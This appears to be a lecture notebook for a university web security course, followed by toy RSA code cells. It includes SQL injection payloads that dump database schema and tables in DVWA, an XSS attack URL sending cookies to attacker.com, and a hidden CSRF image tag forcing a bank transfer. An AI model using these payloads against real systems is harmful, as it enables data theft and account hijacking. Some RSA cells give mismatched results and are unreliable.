# CMP 5006 - Information Security 


## Web Security


### Alejandro Proano, PhD. 

## Introduction to Web Security

- Web security protects websites, web applications, and web services
- Crucial as business and personal activities shift online
- Involves protecting both client-side and server-side components
- Evolving threat landscape requires continuous learning


## Web Security Landscape

- In 2022, web application attacks increased by 251% (Source: Akamai)
- Average cost of a data breach: $4.35 million (IBM Cost of a Data Breach Report 2022)
- 50% of all data breaches involved web applications


## Real-world Application: 2017 Equifax Breach

- Vulnerability: Unpatched Apache Struts framework (CVE-2017-5638)
- Impact: 147 million people's personal data exposed
- Cost: $700 million settlement
- Lesson: Patch management is critical

Reference: [FTC Equifax Data Breach Settlement](https://www.ftc.gov/enforcement/refunds/equifax-data-breach-settlement)


## Real-world Application: GitHub's CSP Journey

- Incrementally deployed CSP to protect against XSS
- Used report-only mode first to identify legitimate use cases
- Iteratively strengthened policy while maintaining functionality

Reference: [GitHub's CSP Journey](https://github.blog/2017-01-19-github-security-update-content-security-policy/)


## Common Web Vulnerabilities: OWASP Top 10

1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfigurations
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging & Monitoring


In [None]:
user = input()
"SELECT * FROM users WHERE username = '{}'".format(user)


--------
user = "admin"
"SELECT * FROM users WHERE username = 'admin'"

user = "admin' OR 1=1--"
"""
SELECT first_name, surname 
FROM users
WHERE username = 'admin' OR 1=1
UNION SELECT information_schema.table_name 
FROM information_schema.tables--'
"""

admin' OR 1=1 UNION SELECT COLUMN_NAME, table_name FROM information_schema.COLUMNS WHERE table_schema='dvwa'#

admin' OR 1=1 UNION SELECT name, comment FROM guestbook#


## Injection Vulnerabilities

- SQL, NoSQL, OS, and LDAP injection
- Occurs when untrusted data is sent as part of a command or query
- Example SQL injection:

```sql
-- Vulnerable code
query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'";

-- Attack input
username: admin' --
password: anything
```

- Result: Authentication bypass


## Cross-Site Scripting (XSS)

- Occurs when applications include untrusted data in web pages
- Three main types:
  - Reflected XSS
  - Stored XSS
  - DOM-based XSS
- Allows attackers to execute scripts in victims' browsers


## XSS Example

```html
<!-- Vulnerable code -->
<div>Welcome, <?php echo $_GET['name']; ?>!</div>

<!-- Attack URL -->
https://example.com/welcome.php?name=<script>document.location='https://attacker.com/steal.php?cookie='+document.cookie</script>
```

- Impact: Cookie theft, session hijacking, phishing


## Cross-Site Request Forgery (CSRF)

- Forces authenticated users to execute unwanted actions
- Leverages the fact that browsers send cookies with every request



## CSRF Example

```html
<!-- Malicious website content -->
<img src="https://bank.com/transfer?to=attacker&amount=1000" style="display:none" />
```

When a logged-in victim visits the malicious site, their browser makes the request with their authentication cookies.


## Content Security Policy (CSP)

- Security layer that helps detect and mitigate certain attacks
- Controls the resources the browser is allowed to load
- Implemented via HTTP header or meta tag

```http
Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com;
```


## Same-Origin Policy and CORS

- Same-Origin Policy (SOP): Security mechanism restricting how documents/scripts interact
- Cross-Origin Resource Sharing (CORS): Controlled relaxation of SOP

```http
Access-Control-Allow-Origin: https://trusted-domain.com
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: X-Custom-Header
```


## Authentication Best Practices

1. Multi-factor authentication
2. Password policies 
3. Secure session management
4. Account lockout policies
5. Secure password storage (bcrypt, Argon2)


## HTTPS and TLS

- HTTPS = HTTP over TLS (Transport Layer Security)
- Provides:
  - Authentication
  - Data integrity
  - Confidentiality


$\text{HTTPS Security} = \min(\text{Certificate strength}, \text{Cipher strength}, \text{Key exchange strength})$



## Web Application Firewalls (WAF)

- Filter, monitor, and block HTTP traffic
- Protect against attacks like XSS, CSRF, SQLi
- Can use signature-based, anomaly-based, or reputation-based detection


## Modern Authentication Frameworks

- OAuth 2.0
- OpenID Connect
- FIDO2/WebAuthn
- Time-based complexity for WebAuthn registration

Reference: [FIDO Alliance](https://fidoalliance.org/specifications/)


## Security Testing Tools

1. Dynamic Application Security Testing (DAST)
   - OWASP ZAP
   - Burp Suite
2. Static Application Security Testing (SAST)
   - SonarQube
   - GitHub CodeQL
3. Interactive Application Security Testing (IAST)
   - Contrast Security
   - Checkmarx


In [3]:
p = 1234567
n = 173*61

In [21]:
pr = 73
pb = 3817


In [24]:
n

10553

In [27]:
c = pow(p, pr, n)
print(c)

6563


In [28]:
print(pow(c, pb, n))

10419


In [30]:
c**pb % n

10419

In [31]:
def gcd(a, b):
    while b:
        a, b = b, a % b
    return a

def mod_inverse(e, phi):
    def egcd(a, b):
        if a == 0:
            return (b, 0, 1)
        else:
            g, y, x = egcd(b % a, a)
            return (g, x - (b // a) * y, y)
    
    g, x, _ = egcd(e, phi)
    if g != 1:
        raise Exception('Modular inverse does not exist')
    else:
        return x % phi

In [36]:
def generate_keypair(p, q, e):
    # Calculate n and phi
    n = p * q
    phi = (p-1) * (q-1)
        
    # Calculate d
    d = mod_inverse(e, phi)
    
    return ((n, e), (n, d))

In [67]:
generate_keypair(173, 61, 107)

((10553, 107), (10553, 7523))

In [38]:
def encrypt(pk, plaintext):
    n, e = pk
    cipher = pow(plaintext, e, n)
    return cipher

def decrypt(pk, ciphertext):
    n, d = pk
    plain = pow(ciphertext, d, n)
    return plain

In [50]:
# Example usage

public_key, private_key = generate_keypair(173, 61, 71)

message = 1234

print("Original Message:", message)

ciphertext = encrypt(public_key, message)
print("Encrypted Message:", ciphertext)

decrypted_message = decrypt(private_key, ciphertext)
print("Decrypted Message:", decrypted_message)

Original Message: 1234
Encrypted Message: 10540
Decrypted Message: 1234


In [56]:
import numpy as np

In [65]:
np.log2(26)

4.700439718141092

In [66]:
np.log2(1/52)

-5.700439718141092